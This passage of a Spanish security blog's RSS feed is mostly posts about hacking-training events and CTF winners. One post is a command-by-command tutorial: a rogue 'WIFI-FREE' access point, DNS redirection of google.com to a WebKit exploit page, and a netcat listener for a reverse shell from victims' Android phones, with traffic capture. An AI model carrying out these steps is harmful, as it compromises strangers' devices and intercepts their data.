Publicado por Leonardo Pigñer en &lt;a href="http://www.kungfoosion.com/"&gt;www.KUNGFOOSION.com&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8471324546808744058-2162308804295988985?l=www.kungfoosion.com' alt='' /&gt;&lt;/div&gt;&lt;img src="http://feeds.feedburner.com/~r/KungFooSion/~4/1KAk7paVKKM" height="1" width="1"/&gt;</description><link>http://feedproxy.google.com/~r/KungFooSion/~3/1KAk7paVKKM/nuevo-colaborador-del-blog.html</link><author>noreply@blogger.com (KungFooSion)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://4.bp.blogspot.com/_8alnjaETaog/TVFnxAG-vaI/AAAAAAAAFkc/947oF_v8pYg/s72-c/padawan_kfs.jpg" height="72" width="72" /><thr:total>2</thr:total><feedburner:origLink>http://www.kungfoosion.com/2011/02/nuevo-colaborador-del-blog.html</feedburner:origLink></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-8471324546808744058.post-8087890913584020954</guid><pubDate>Mon, 07 Feb 2011 17:57:00 +0000</pubDate><atom:updated>2011-03-23T16:48:11.292-03:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">COMBAT_Training</category><title>Ninjas de "La Mitad del Mundo"</title><description>&lt;div style="text-align: justify;"&gt;La semana pasada el &lt;b&gt;&lt;a href="http://www.base4sec.com/capacitacion-detalle.php?id=409"&gt;COMBAT Training&lt;/a&gt;&lt;/b&gt; paso por Quito - Ecuador, también conocida como "La Mitad del Mundo"!&lt;/div&gt;&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://3.bp.blogspot.com/_8alnjaETaog/TVAxOjK02mI/AAAAAAAAFkU/WDdqg3w8M6w/s1600/grupal_quito.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="328" src="http://3.bp.blogspot.com/_8alnjaETaog/TVAxOjK02mI/AAAAAAAAFkU/WDdqg3w8M6w/s400/grupal_quito.JPG" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://3.bp.blogspot.com/_8alnjaETaog/TVAvZFbGBqI/AAAAAAAAFkE/ikhy3s8WucU/s1600/la_ley_y_el_orden.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;/a&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;Fue un verdadero orgullo y honor haber tenido la oportunidad de dictar un training a la Fiscalía General del Estado de Ecuador, quienes constantemente se capacitan con la misión de combatir los delitos informáticos.&lt;/div&gt;&lt;br /&gt;
&lt;div style="text-align: justify;"&gt;Hace pocos meses, cuando dictamos el &lt;a href="http://www.kungfoosion.com/2010/11/primer-combat-training-en-ecuador.html"&gt;COMBAT Training en Guayaquil&lt;/a&gt; me sorprendió el buen humor de los ecuatorianos, y lo termine de confirmar en Quito, con una semana que dejo muchísimas anécdotas e historias ;) &lt;br /&gt;
&lt;br /&gt;
Los ganadores del CTF de esta edición fueron, &lt;a href="http://twitter.com/gaboecf"&gt;Gabriel Cuestas&lt;/a&gt;, Carolina Salas y Luis Pavón. Felicitaciones! &lt;/div&gt;&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://2.bp.blogspot.com/_8alnjaETaog/TVAveOixB3I/AAAAAAAAFkI/G3DlnNnvWNY/s1600/ganador_ctf.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="315" src="http://2.bp.blogspot.com/_8alnjaETaog/TVAveOixB3I/AAAAAAAAFkI/G3DlnNnvWNY/s400/ganador_ctf.JPG" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;
&lt;div style="text-align: justify;"&gt;Sin ninguna duda fue una de las finales mas peleadas que recuerdo… en un momento parecía que "EL PAPI" se llevaba la katana a su casa, pero a ultimo momento "EL GABO" tomo la delantera y lo gano, seguido por "TOTO" con una diferencia mínima. Mención especial se merece Pedro Ponce, también conocido como piter.php, que dio una gran batalla contra su archienemigo "EL PAPI" :P&lt;br /&gt;
&lt;br /&gt;
Como era la primera vez que estaba en una fiscalía, no podía dejar  pasar la oportunidad de cumplir mi sueño de ser JUEZ! Me vi tentado a  dictar el training desde allí, pero no me dejaron… :D &lt;/div&gt;&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://3.bp.blogspot.com/_8alnjaETaog/TVAxAgEGNqI/AAAAAAAAFkQ/qWNnwsT3jNM/s1600/la_ley_y_el_orden.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="387" src="http://3.bp.blogspot.com/_8alnjaETaog/TVAxAgEGNqI/AAAAAAAAFkQ/qWNnwsT3jNM/s400/la_ley_y_el_orden.JPG" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;
&lt;div style="text-align: justify;"&gt;Espero tener la oportunidad de próximamente volver a Ecuador, donde me encontré con un grupo de personas excelente!&lt;/div&gt;&lt;br /&gt;
&lt;br /&gt;
Publicado por Leonardo Pigñer en &lt;a href="http://www.kungfoosion.com/"&gt;www.KUNGFOOSION.com&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8471324546808744058-8087890913584020954?l=www.kungfoosion.com' alt='' /&gt;&lt;/div&gt;&lt;img src="http://feeds.feedburner.com/~r/KungFooSion/~4/OKglUVv2R2M" height="1" width="1"/&gt;</description><link>http://feedproxy.google.com/~r/KungFooSion/~3/OKglUVv2R2M/ninjas-de-la-mitad-del-mundo.html</link><author>noreply@blogger.com (KungFooSion)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://3.bp.blogspot.com/_8alnjaETaog/TVAxOjK02mI/AAAAAAAAFkU/WDdqg3w8M6w/s72-c/grupal_quito.JPG" height="72" width="72" /><thr:total>4</thr:total><feedburner:origLink>http://www.kungfoosion.com/2011/02/ninjas-de-la-mitad-del-mundo.html</feedburner:origLink></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-8471324546808744058.post-7409142287301164109</guid><pubDate>Mon, 17 Jan 2011 19:02:00 +0000</pubDate><atom:updated>2011-03-23T16:48:11.294-03:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">COMBAT_Training</category><title>Primer COMBAT Training en CHILE!</title><description>&lt;div style="text-align: justify;"&gt;La semana pasada tuvo lugar la primer edición del COMBAT Training en Santiago de Chile, con un grupo de ninjas bastante competitivos!&lt;br /&gt;
&lt;br /&gt;
De izquierda a derecha, &lt;a href="http://twitter.com/p4dawan"&gt;p4dawan&lt;/a&gt;, Victor, &lt;a href="http://twitter.com/insecurechile"&gt;Manuel&lt;/a&gt;, Freddy, Tamara, y abajo, Rodrigo I., Marco, &lt;a href="http://twitter.com/kfs"&gt;kfs&lt;/a&gt;, Rodrigo S.M. y Pablo. Falto Alejandro en la foto, que a ultimo momento se tuvo que ir.&amp;nbsp;&lt;/div&gt;&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://1.bp.blogspot.com/_8alnjaETaog/TTSRX64V0rI/AAAAAAAAFfw/mAMjhbgA5yg/s1600/grupal_chile.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="326" src="http://1.bp.blogspot.com/_8alnjaETaog/TTSRX64V0rI/AAAAAAAAFfw/mAMjhbgA5yg/s400/grupal_chile.JPG" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;
&lt;div style="text-align: justify;"&gt;Los ganadores del CTF de esta edición fueron, &lt;a href="http://twitter.com/insecurechile"&gt;Manuel Moreno&lt;/a&gt;, Pablo Antonio Ramirez Hoffman y Rodrigo Santa Maria. Estuvo todo muy peleado durante toda la semana, y a ultimo momento Pablo "casi" le roba la gloria a Manuel, pero sin dudas cualquiera de los tres se lo merece ampliamente. Felicitaciones!&lt;br /&gt;
&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://4.bp.blogspot.com/_8alnjaETaog/TTSRjqgB3DI/AAAAAAAAFf0/3QZxidGfm-c/s1600/winners_chile.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="400" src="http://4.bp.blogspot.com/_8alnjaETaog/TTSRjqgB3DI/AAAAAAAAFf0/3QZxidGfm-c/s400/winners_chile.JPG" width="345" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;
&lt;div style="text-align: justify;"&gt;Los ninjas chilenos no solo tenían un muy buen nivel técnico, sino que también mucho humor, por lo que toda la semana fue muy divertida!&lt;br /&gt;
&lt;br /&gt;
Algo que también descubrí, es que la capacidad de los chilenos para beber cerveza es comparable a la de los colombianos, toman muchísimo! El Viernes después del training fuimos a un bar, y se me ocurrió bromear con que tenían poca capacidad alcohólica… creo que terminanos tomando mas de 10 jarras de cerveza y fuimos los últimos en irnos del bar. Yo y mi bocota! :D&lt;br /&gt;
&lt;br /&gt;
Un fuerte abrazo para todos los amigos de Chile!!&lt;/div&gt;&lt;br /&gt;
- &lt;a href="http://picasaweb.google.com/lpigner/COMBAT_CHILE_01_2011#"&gt;Fotos del COMBAT en Chile&lt;/a&gt;&lt;br /&gt;
- &lt;a href="http://www.kungfoosion.com/search/label/COMBAT_Training"&gt;Mas info del COMBAT Training&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;span style="font-size: x-small;"&gt;Publicado por Leonardo Pigñer en &lt;a href="http://www.kungfoosion.com/"&gt;www.KUNGFOOSION.com&lt;/a&gt;&lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8471324546808744058-7409142287301164109?l=www.kungfoosion.com' alt='' /&gt;&lt;/div&gt;&lt;img src="http://feeds.feedburner.com/~r/KungFooSion/~4/pTwty5BdBFg" height="1" width="1"/&gt;</description><link>http://feedproxy.google.com/~r/KungFooSion/~3/pTwty5BdBFg/primer-combat-training-en-chile.html</link><author>noreply@blogger.com (KungFooSion)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://1.bp.blogspot.com/_8alnjaETaog/TTSRX64V0rI/AAAAAAAAFfw/mAMjhbgA5yg/s72-c/grupal_chile.JPG" height="72" width="72" /><thr:total>0</thr:total><feedburner:origLink>http://www.kungfoosion.com/2011/01/primer-combat-training-en-chile.html</feedburner:origLink></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-8471324546808744058.post-47245066265030694</guid><pubDate>Mon, 27 Dec 2010 14:18:00 +0000</pubDate><atom:updated>2011-06-07T15:12:37.652-03:00</atom:updated><title>COMBAT Training en Chile y Colombia</title><description>&lt;div style="text-align: justify;"&gt;Durante este verano vamos a estar dictando el popular &lt;b&gt;&lt;a href="http://www.base4sec.com/capacitacion.php"&gt;COMBAT Training&lt;/a&gt;&lt;/b&gt; por Chile y Colombia, no te lo pierdas!&lt;/div&gt;&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://3.bp.blogspot.com/_8alnjaETaog/TRifnL52ZyI/AAAAAAAAFWY/z6IHw1AwxiM/s1600/Wallpaper-Combat.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="225" src="http://3.bp.blogspot.com/_8alnjaETaog/TRifnL52ZyI/AAAAAAAAFWY/z6IHw1AwxiM/s400/Wallpaper-Combat.jpg" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;
&lt;div style="text-align: justify;"&gt;Si no sabés de que se trata el &lt;b&gt;&lt;a href="http://www.base4sec.com/capacitacion.php"&gt;COMBAT Training&lt;/a&gt;&lt;/b&gt; podés encontrar más información aquí:&lt;/div&gt;&lt;a href="http://www.kungfoosion.com/search/label/COMBAT_Training"&gt;http://www.kungfoosion.com/search/label/COMBAT_Training&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;&lt;span style="font-size: large;"&gt;CHILE&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
- &lt;b&gt;10 al 14 de Enero&lt;span style="font-size: large;"&gt;&lt;br /&gt;
&lt;br /&gt;
COLOMBIA&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
- &lt;b&gt;15 al 19 de Febrero&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;div style="text-align: justify;"&gt;Para consultas podés contactarte a capacitacion@base4sec.com&lt;br /&gt;
&lt;br /&gt;
Nos vemos por allí! ;-)&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8471324546808744058-47245066265030694?l=www.kungfoosion.com' alt='' /&gt;&lt;/div&gt;&lt;img src="http://feeds.feedburner.com/~r/KungFooSion/~4/briIypPZ4lY" height="1" width="1"/&gt;</description><link>http://feedproxy.google.com/~r/KungFooSion/~3/briIypPZ4lY/combat-training-en-chile-y-colombia.html</link><author>noreply@blogger.com (KungFooSion)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://3.bp.blogspot.com/_8alnjaETaog/TRifnL52ZyI/AAAAAAAAFWY/z6IHw1AwxiM/s72-c/Wallpaper-Combat.jpg" height="72" width="72" /><thr:total>3</thr:total><feedburner:origLink>http://www.kungfoosion.com/2010/12/combat-training-en-chile-y-colombia.html</feedburner:origLink></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-8471324546808744058.post-7935957504996825251</guid><pubDate>Mon, 20 Dec 2010 18:05:00 +0000</pubDate><atom:updated>2011-03-23T16:48:11.298-03:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">COMBAT_Training</category><title>COMBAT Training: Ninjas de Navidad</title><description>&lt;div style="text-align: justify;"&gt;La semana pasada se realizó la última edición del &lt;a href="http://www.base4sec.com/capacitacion.php"&gt;COMBAT Training&lt;/a&gt; en Buenos Aires, y algunos ninjas recibieron su regalo de navidad anticipado! ;-)&lt;/div&gt;&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://2.bp.blogspot.com/_8alnjaETaog/TQ-ZYMUUH6I/AAAAAAAAFTw/Y_IKviFlzfc/s1600/SAM_0330.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="386" src="http://2.bp.blogspot.com/_8alnjaETaog/TQ-ZYMUUH6I/AAAAAAAAFTw/Y_IKviFlzfc/s400/SAM_0330.JPG" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;
&lt;div style="text-align: justify;"&gt;Felicitaciones para Aldo Fernandez, Claudio Bazán y Sebastián Ornani quienes se llevaron la katana, la estrella ninja y los cuchillos. Fue increíble como Aldo a último minuto tomó control de todos los hosts que había owneado Claudio, felicitaciones!&lt;/div&gt;&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://4.bp.blogspot.com/_8alnjaETaog/TQ-Znzp3FhI/AAAAAAAAFT0/WMhxhaZ6CxU/s1600/SAM_0335.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="371" src="http://4.bp.blogspot.com/_8alnjaETaog/TQ-Znzp3FhI/AAAAAAAAFT0/WMhxhaZ6CxU/s400/SAM_0335.JPG" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;
&lt;div style="text-align: justify;"&gt;Entre los asistentes de este training también tuvimos la presencia de la autora &lt;a href="http://www.myspace.com/enlaspisadasdemisombra"&gt;Marcelle Lefineau&lt;/a&gt;, que recientemente publico el libro &lt;b&gt;&lt;i&gt;"Tribus Urbanas - La indumentaria desde una perspectiva multicultural"&lt;/i&gt;&lt;/b&gt;, y quien nos desasnó durante toda la semana sobre algunos preconceptos erróneos que teníamos sobre las tribus urbanas. Les recomiendo este libro!&lt;br /&gt;
&lt;br /&gt;
Cuando dictamos el training en Buenos Aires siempre llevamos a los alumnos a almorzar a Los Leños Tango Grill, una muy buena parrilla del microcentro porteño, y esta vez no solo se sumo parte del team de &lt;a href="http://www.base4sec.com/"&gt;BASE4&lt;/a&gt;, sino también el amigo &lt;a href="http://twitter.com/gduperre"&gt;@gduperre&lt;/a&gt;, ganador del &lt;a href="http://www.kungfoosion.com/2010/11/cronicas-del-wifu-combat-training.html"&gt;CTF del último WiFu&lt;/a&gt;.&lt;/div&gt;&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://3.bp.blogspot.com/_8alnjaETaog/TQ-Z5dWaWTI/AAAAAAAAFT4/s1GUlThyY4s/s1600/SAM_0327.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="267" src="http://3.bp.blogspot.com/_8alnjaETaog/TQ-Z5dWaWTI/AAAAAAAAFT4/s1GUlThyY4s/s400/SAM_0327.JPG" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;
&lt;div style="text-align: justify;"&gt;De paso aprovecho para saludar a Cristian, nuestro mozo de Los Leños, que no solo tiene una *increíble* memoria, sino que siempre nos atiende de la mejor manera :)&lt;br /&gt;
&lt;br /&gt;
Nos vemos próximamente en Chile y Colombia!&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8471324546808744058-7935957504996825251?l=www.kungfoosion.com' alt='' /&gt;&lt;/div&gt;&lt;img src="http://feeds.feedburner.com/~r/KungFooSion/~4/6VpC9IdfkUk" height="1" width="1"/&gt;</description><link>http://feedproxy.google.com/~r/KungFooSion/~3/6VpC9IdfkUk/combat-training-ninjas-de-navidad.html</link><author>noreply@blogger.com (KungFooSion)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://2.bp.blogspot.com/_8alnjaETaog/TQ-ZYMUUH6I/AAAAAAAAFTw/Y_IKviFlzfc/s72-c/SAM_0330.JPG" height="72" width="72" /><thr:total>7</thr:total><feedburner:origLink>http://www.kungfoosion.com/2010/12/combat-training-ninjas-de-navidad.html</feedburner:origLink></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-8471324546808744058.post-8763794221914248659</guid><pubDate>Thu, 02 Dec 2010 21:31:00 +0000</pubDate><atom:updated>2010-12-03T17:28:58.930-03:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">Moviles</category><category domain="http://www.blogger.com/atom/ns#">Wireless</category><category domain="http://www.blogger.com/atom/ns#">Android</category><title>Explotando Android vía Web con airbase-ng</title><description>&lt;div style="text-align: justify;"&gt;Recientemente se publicó una vulnerabilidad en WebKit (&lt;a href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1807"&gt;CVE-2010-1807&lt;/a&gt;), utilizado por Safari y Chrome, que también afecta al browser de los móviles con Android.&lt;/div&gt;&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://3.bp.blogspot.com/_8alnjaETaog/TPgLct7KX-I/AAAAAAAAFSc/HzpA5cBRzeg/s1600/airbase-ng_android.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="312" src="http://3.bp.blogspot.com/_8alnjaETaog/TPgLct7KX-I/AAAAAAAAFSc/HzpA5cBRzeg/s400/airbase-ng_android.JPG" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;
&lt;div style="text-align: justify;"&gt;La vulnerabilidad fue descubierta por M.J. Keith, quien también publicó un &lt;a href="http://www.exploit-db.com/exploits/15423/"&gt;exploit&lt;/a&gt; durante una &lt;a href="http://houstonseccon.com/"&gt;conferencia&lt;/a&gt; en Houston, y luego &lt;a href="http://www.twitter.com/ihackbanme"&gt;Itzhak Avraham&lt;/a&gt;, realizó &lt;a href="http://www.exploit-db.com/exploits/15548/"&gt;algunas mejoras&lt;/a&gt; sobre el mismo para darle un mayor grado de éxito a la explotación.&lt;br /&gt;
&lt;br /&gt;
Esta vulnerabilidad afecta a móviles Android versión 2.1 e inferiores, si bien la ultima versión 2.2 no esta afectada, no todos los fabricantes de móviles u operadores de telefonía, obligan a sus usuarios a actualizar el software.&lt;br /&gt;
&lt;br /&gt;
Por ejemplo, en mi caso estoy usando un Motorola Milestone con Android 2.1-update1, y si bien la versión 2.2 esta disponible hace ya un buen tiempo, Motorola recién comenzará a realizar upgrades para Milestone en Latinoamérica en el &lt;a href="https://supportforums.motorola.com/community/manager/softwareupgrades"&gt;primer trimestre del 2011&lt;/a&gt;.&lt;br /&gt;
&lt;br /&gt;
Una vergüenza por parte de fabricantes y operadores!&lt;/div&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;span style="font-size: large;"&gt;&lt;b&gt;Explotando Android&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;div style="text-align: justify;"&gt;Para explotar esta vulnerabilidad, el móvil con Android debería visitar un sitio Web que posea el código malicioso.&lt;br /&gt;
&lt;br /&gt;
Podríamos hacer esto en Internet, o como lo vamos a hacer a continuación, levantar un Access Point falso para darle Internet a personas con móviles, y cuando realicen una solicitud especifica de DNS, redirigirlos a una Web local con el código malicioso. &lt;/div&gt;&lt;br /&gt;
&lt;span style="font-size: large;"&gt;&lt;b&gt;1. Preparando el Exploit&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;div style="text-align: justify;"&gt;Bajamos el exploit y lo dejamos en el home de Apache con el nombre "index.html":&lt;/div&gt;&lt;br /&gt;
&lt;pre class="codigo"&gt;nano /var/www/index.html

/etc/init.d/apache2 start&lt;/pre&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;div style="text-align: justify;"&gt;En las primeras líneas del exploit mejorado por Itzhak podemos encontrar la posibilidad de fácilmente cambiar la dirección IP y el puerto en el shellcode:&lt;/div&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;pre class="codigo"&gt;var ip = unescape("\ua8c0\u0100"); // ip = 192.168.0.1
var port = unescape("\u3930"); //port 12345 (hex(0x3039))&lt;/pre&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;div style="text-align: justify;"&gt;En este caso, una vez que la explotación sea exitosa, se va a producir una conexión reversa a la IP &lt;i&gt;"192.168.0.1"&lt;/i&gt; en el puerto &lt;i&gt;"12345"&lt;/i&gt;, por lo que deberíamos dejar escuchando Netcat en ese puerto: &lt;/div&gt;&lt;br /&gt;
&lt;pre class="codigo"&gt;nc -l -p 12345 -n -vvv
listening on [any] 12345 ...&lt;/pre&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;span style="font-size: large;"&gt;&lt;b&gt;2. Preparando el Access Point Falso&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;div style="text-align: justify;"&gt;Con lo hecho en el paso anterior, ya estaríamos en condición de atacar exitosamente a una víctima si utilizáramos una dirección IP pública en Internet.&lt;br /&gt;
&lt;br /&gt;
Pero la idea a continuación, es levantar un Access Point falso con airodump-ng para que las personas con móviles se asocien a el en busca de Internet gratis, y cuando realicen un pedido DNS especifico lo reenviemos a nuestro Apache con el código malicioso.&lt;br /&gt;
&lt;br /&gt;
Primero vamos a configurar Dnsmasq, quien nos va a proveer el servicio de DNS y de DHCP para nuestro Access Point falso. Si no lo tenemos instalado, lo podemos hacer de la siguiente forma:&lt;/div&gt;&lt;br /&gt;
&lt;pre class="codigo"&gt;apt-get install dnsmasq
/etc/init.d/dnsmasq stop&lt;/pre&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;div style="text-align: justify;"&gt;Luego debemos asegurarnos de configurar en que interfaz de red va a escuchar Dnsmasq, configurar el rango de direcciones IP que entregará a las víctimas, y cual será el dominio que será redireccionado a nuestros Apache con el exploit, en este caso &lt;i&gt;"google.com"&lt;/i&gt;: &lt;/div&gt;&lt;br /&gt;
&lt;pre class="codigo"&gt;nano /etc/dnsmasq.conf
interface=at0
dhcp-range=192.168.0.5,192.168.0.20,12h
address=/google.com/192.168.0.1
/etc/init.d/dnsmasq start&lt;/pre&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;div style="text-align: justify;"&gt;Si tenemos Internet, seria una buena idea forwardear todo el trafico para que la víctima crea que esta en una red Wireless común y corriente, y de paso tenemos la posibilidad de capturar algo de trafico:&lt;/div&gt;&lt;br /&gt;
&lt;pre class="codigo"&gt;echo 1 &amp;gt; /proc/sys/net/ipv4/ip_forward
iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE&lt;/pre&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;div style="text-align: justify;"&gt;Finalmente levantamos el Access Point falso con airabase-ng, y configuramos la interfaz de red "at0", creada por airbase-ng, con la dirección IP a donde se realizará la conexión reversa:&lt;/div&gt;&lt;br /&gt;
&lt;pre class="codigo"&gt;airbase-ng -C 30 --essid "WIFI-FREE" wlan0 &amp;nbsp;
ifconfig at0 192.168.0.1 netmask 255.255.255.0 up&lt;/pre&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;div style="text-align: justify;"&gt;En este caso, la red se llama &lt;i&gt;"WIFI-FREE"&lt;/i&gt;, aunque podríamos realizar otra variedad de ataques similares.&lt;/div&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;span style="font-size: large;"&gt;&lt;b&gt;3. Atacando a la Víctima&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;div style="text-align: justify;"&gt;Por mi experiencia con el Motorola Milestone, cuando encendemos la placa Wireless del móvil, hay que detectar las redes en el área, y conectarnos manualmente a la que queremos, mas halla de que este abierta y sin cifrado. Luego de hacer esto, la siguiente vez lo hace automáticamente.&lt;br /&gt;
&lt;br /&gt;
Cuando la víctima esta conectada, el trafico de red pasara normalmente hasta que quiera ingresar a &lt;i&gt;"www.google.com"&lt;/i&gt;, en donde será redirigido a nuestro Apache y obtendremos una conexión reversa en el Netcat que dejamos escuchando:&lt;/div&gt;&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://4.bp.blogspot.com/_8alnjaETaog/TPgNkX4xf_I/AAAAAAAAFSg/YitXzHS22_M/s1600/exploit_reverso_android.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="262" src="http://4.bp.blogspot.com/_8alnjaETaog/TPgNkX4xf_I/AAAAAAAAFSg/YitXzHS22_M/s400/exploit_reverso_android.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;
&lt;div style="text-align: justify;"&gt;Una vez que recibimos la conexión reversa podemos ejecutar comandos de Android como &lt;i&gt;"/system/bin/id"&lt;/i&gt; o &lt;i&gt;"/system/bin/ps"&lt;/i&gt; para verificar que efectivamente pudimos acceder al dispositivo.&lt;/div&gt;&lt;br /&gt;
&lt;br /&gt;
Info relacionada:&lt;br /&gt;
- &lt;a href="http://www.exploit-db.com/exploits/15423/"&gt;Exploit original por M.J. Keith&lt;/a&gt;&lt;br /&gt;
- &lt;a href="http://www.exploit-db.com/exploits/15548/"&gt;Exploit modificado por Itzhak Avraham&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
Posts relacionados:&lt;br /&gt;
- &lt;a href="http://www.kungfoosion.com/2009/11/karmetasploit-en-backtrack-4.html"&gt;Karmetasploit en BackTrack 4&lt;/a&gt;&lt;br /&gt;
- &lt;a href="http://www.kungfoosion.com/2009/10/jugando-con-airpcap.html"&gt;Jugando con AirPcap&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;span style="font-size: x-small;"&gt;Publicado por Leonardo Pigñer en &lt;a href="http://www.kungfoosion.com/"&gt;www.KUNGFOOSION.com&lt;/a&gt;&lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8471324546808744058-8763794221914248659?l=www.kungfoosion.com' alt='' /&gt;&lt;/div&gt;&lt;img src="http://feeds.feedburner.com/~r/KungFooSion/~4/p6Ji7i-subM" height="1" width="1"/&gt;</description><link>http://feedproxy.google.com/~r/KungFooSion/~3/p6Ji7i-subM/explotando-android-via-web-con-airodump.html</link><author>noreply@blogger.com (KungFooSion)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://3.bp.blogspot.com/_8alnjaETaog/TPgLct7KX-I/AAAAAAAAFSc/HzpA5cBRzeg/s72-c/airbase-ng_android.JPG" height="72" width="72" /><thr:total>0</thr:total><feedburner:origLink>http://www.kungfoosion.com/2010/12/explotando-android-via-web-con-airodump.html</feedburner:origLink></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-8471324546808744058.post-5667853759793269516</guid><pubDate>Wed, 01 Dec 2010 15:16:00 +0000</pubDate><atom:updated>2010-12-03T17:25:58.344-03:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">PampaSeg</category><title>Se viene PampaSeg 2010!</title><description>&lt;div style="text-align: justify;"&gt;El próximo 3 y 4 de Diciembre en la ciudad de Santa Rosa, La Pampa, tendrá lugar la 2a. edición de &lt;a href="http://www.pampaseg.org/"&gt;PampaSeg&lt;/a&gt;!&lt;/div&gt;&lt;br /&gt;
